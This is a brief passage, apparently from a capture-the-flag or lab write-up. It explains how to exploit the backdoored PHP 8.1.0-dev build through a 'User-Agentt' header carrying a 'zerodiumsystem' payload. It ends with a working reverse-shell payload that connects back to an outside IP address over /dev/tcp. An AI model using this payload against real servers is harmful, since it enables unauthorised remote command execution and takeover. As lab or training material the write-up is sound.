Looking at the response headers we see:

X-Powered-By: PHP/8.1.0-dev

This version has a backdoor (https://www.exploit-db.com/exploits/49933) which we can abuse.

It uses the uses a second special User-Agentt header to execute code.

"User-Agentt": "zerodiumsystem('<cmd>);"

Getting a reverse shell:

User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.8.119.137/4444 0>&1"');